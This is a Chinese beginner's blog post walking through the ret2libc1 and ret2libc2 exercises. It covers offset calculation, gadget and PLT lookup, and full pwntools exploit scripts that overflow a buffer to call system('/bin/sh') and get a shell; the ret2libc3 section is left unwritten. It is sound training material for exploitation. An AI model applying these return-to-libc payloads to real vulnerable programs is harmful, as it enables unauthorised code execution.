Pwn学习-ret2libc三联

已于 2023-11-07 15:20:05 修改
阅读量142 收藏
点赞数
分类专栏: pwn 文章标签: 学习
于 2023-11-05 00:35:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cdl10000/article/details/134219556
版权
本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。若存在理解错误,请大家指出来。
#ret2libc1

首先常规检查

计算偏移量,这个对新人不太友好有坑。重点记住:从输入函数的位置ret至下个main函数的量就是即将覆盖的偏移量。

输入字符的位置:

继续跟进调试,直至ret至下个main函数,再查看stack

此时的stack情况:

正常请求ebp要ret至main函数,因此把此间的变量覆盖成其他的函数地址。此处调试过程需要注意,输入的位置是gets函数,要继续调试至main函数再查看stack,计算此时的偏移量,偏移量为112

In [16]:  0xffffd4bc -0xffffd44c
Out[16]: 112

使用ida查看system函数和/bin/sh对应地址:

system_adr=0x08048460
binsh_adr=0x08048720

构造exp,:

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')
binsh_adr = 0x8048720
system_adr = 0x08048460
payload = flat(['a' * 112, system_adr, 'b' * 4, binsh_adr])
sh.sendline(payload)

sh.interactive()

上面exp有新人坑点:知识点:

payload = flat(['a' * 112, system_adr, 'b' * 4, binsh_adr])
sh.sendline(payload)

'b'*4作为虚假的返回地址(长度固定),用于使函数调用结构完整。遇到类似的函数均需要先接收返回地址。flat函数是用来自动生成payload的函数。

顺序是:[溢出长度 + 函数名称 + 函数返回地址 + 函数参数]

一步一坑,好好学习,天天向上。

此题目第二种解法:

使用pwntools 给我们提供了一个很好用的用来布置 rop 的工具,链接见Pwn学习-ret2syscall-CSDN博客

from pwn import *
context.log_level = "debug"
#context.terminal = ['tmux', 'splitw', '-h']
context.kernel = 'i386'
elf = ELF('./ret2libc1')
rop = ROP(elf)
sh = process('./ret2libc1')
#gdb.attach(sh, '''
#    break main
#''')
binsh_addr = next(elf.search(b'/bin/sh')) #0x8048720
rop.raw(b'A' * 112)
rop.call('system', [binsh_addr])
#system_plt = system
#payload = flat(['a' * 112, system_plt, 'b' * 4, binsh_addr])
print(rop.dump())
raw_rop = rop.chain()
sh.send(raw_rop)
sh.recvline()
sh.interactive()

思路一样,减少找函数的过程,提升解题效率。

#ret2libc2

此题目与上一题最大的区别就是没有/bin/sh,那么结合攻击思路,需要写一个/bin/sh进去执行。此次需要我们自己来读取字符串,所以我们需要两个 gadgets,第一个控制程序读取字符串,第二个控制程序执行 system("/bin/sh")

调试过程中有坑,需要一个地址能够写进程序,使用IDA调试,发现buf2函数可以写入。

查找pop、ret返回链

root@Ubuntu20:/home/stack/ret2libc/ret2libc2# ROPgadget --binary ret2libc2 --only 'pop|ret'
Gadgets information
============================================================
0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1

Unique gadgets found: 7

查找plt

pwndbg> plt
Section .plt 0x8048440-0x8048500:
0x8048450: printf@plt
0x8048460: gets@plt
0x8048470: time@plt
0x8048480: puts@plt
0x8048490: system@plt
0x80484a0: __gmon_start__@plt
0x80484b0: srand@plt
0x80484c0: __libc_start_main@plt
0x80484d0: setvbuf@plt
0x80484e0: rand@plt
0x80484f0: __isoc99_scanf@plt

得到需要的数值

gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080

构造exp:

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc2')
input()
gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
payload =b'a'*0x70+p32(gets_plt)+p32(pop_ebx)+p32(buf2)+p32(system_plt)+b'b'*0x4+p32(buf2)
#payload = flat(
    ['a' * 112, gets_plt, pop_ebx, buf2, system_plt, 'b'*4, buf2])
sh.sendline(payload)
sh.sendline('/bin/sh')
sh.interactive()

第二种方法:

from pwn import *
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
context.kernel = 'i386'
elf = ELF('./ret2libc2')
rop = ROP(elf)
sh = process('./ret2libc2')
buf2 = 0x804a080
rop.raw(b'A' * 112)
rop.call('gets', [b"/bin/sh", buf2])
rop.call('system', [buf2])
print(rop.dump())
raw_rop = rop.chain()
sh.send(raw_rop)
sh.recvline()
sh.interactive()

#ret2libc3

待补充。

T1me1ntheSt0ry
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn-ret2libc基础
admin的博客
10-04 896
题源:基本 ROP - CTF Wiki (ctf-wiki.org)ret2libc的例三 这题的特点是:没有system,没有bin/sh。但是有puts,和gets函数。碰到gets函数基本上又是栈溢出大类中的题目。 ①先检查保护 ②:计算system和bin/sh的实际地址。 核心公式就是:函数真实地址=基地址+偏移量 那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点 ①system 函数属于 libc,而 libc.so 动态链接...
pwn入门系列-ret2libc2
小心信科理化声
12-10 3089
Ret2libc2 今天来做一下经典的retlibc系列的第二题 资源:ret2libc2 老样子先checksec [*] '/home/giantbranch/Desktop/pwn/ret2libc2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 可以看到
ret2libc1
m0_49959202的博客
08-06 296
文章目录ret2libc11.简单机制介绍2.程序分析3.exp编写 ret2libc1 1.简单机制介绍 ret2libc即控制程序执行libc中的函数,一般是返回至某个plt处或者函数的具体的位置(比如got表项的内容)。一般,我们选择跳转到system("/bin/sh")位置,从而获取shell。当程序调用某个函数时,程序会去plt表内查找,plt表再去got内查找,如果got内存在那么直接返回;如果不存在那么就调用查找函数搜寻需要用到的函数,然后存入got表内。 当前的ret2libc1:有sy
PWN计算libc偏移
最新发布
sagic的博客
07-18 134
已知__libc_start_main+240。用stack地址-vmmap地址得出偏移。首先程序进行一定的运行查看stack。所以在libc.sym中要-240。还是帕鲁杯2024Palu为例。以帕鲁杯2024Palu为例。
Ret2libc 1
weixin_44864859的博客
05-19 711
Ret2libc 1 题目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
PWN · ret2libc】ret2libc1
Mr_Fmnwon的博客
05-08 1352
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
PWN —— ret2libc1
qq_41696518的博客
07-03 443
ret2libc1
pwn ret2libc
清霂的博客
02-04 467
目录1.攻防世界 level32.buu babyrop3.buu ciscn_2019_c_1 1.攻防世界 level3 把文件放到kali里面发现是一个压缩包(放入exeinfo里面也可以发现是压缩包),解压缩得到level3和libc.so文件 file checksec ida32 进入漏洞函数vunl(),发现有栈溢出漏洞 没有system函数和/bin/sh 题目提示了用libclibc.so是一个函数库(类似于C语言#include<iostream>的iostrea
PWN篇:ret2libc
weixin_44644249的博客
01-28 444
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8226
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
ret2libc1pwn 入门题
02-11
pwn 入门题
PWN基础17:Ret2Libc 64位实例
prettyX的博客
07-24 4445
复现一下Ret2Libc 32位下的内存布局 针对这张图,我们在上一节做了细致的分析 32位的调用方式 32位系统中调用函数的方式:栈传递参数 构造函数调用将参数和返回地址放在栈上 构造执行write(1,buf2,20)后,再返回main函数 64位的调用方式 64位系统中使用寄存器传递参数:rdi、rsi、rdx、rcx、r8、r9(1-6个参数) 这节课,我们研究的源码 #include <stdio.h> char buf2[10]="ret2libc is goo
Ret2Libc(1) (有system、/bin/sh)绕过NX、ASLR
X丶 的博客
11-21 1119
Ret2Libc即控制程序执行libc库中的函数。 通常是返回到某个函数的plt处,或者函数运行时候的实际地址。 下面是一个例子: 可以看出程序gets有一个明显的溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO...
ROP-基础-ret2libc1
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码:0wn8 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
pwn学习——ret2libc1
MrTreebook的博客
11-28 1290
pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一
Ret2libc
钞sir的博客
01-26 8899
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
跟着CTF-wiki学pwn——ret2libc1
qq_42882717的博客
07-05 416
CTF-wiki的注解:简单的ret2libc
pwn ret2libc原理
08-22
- *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值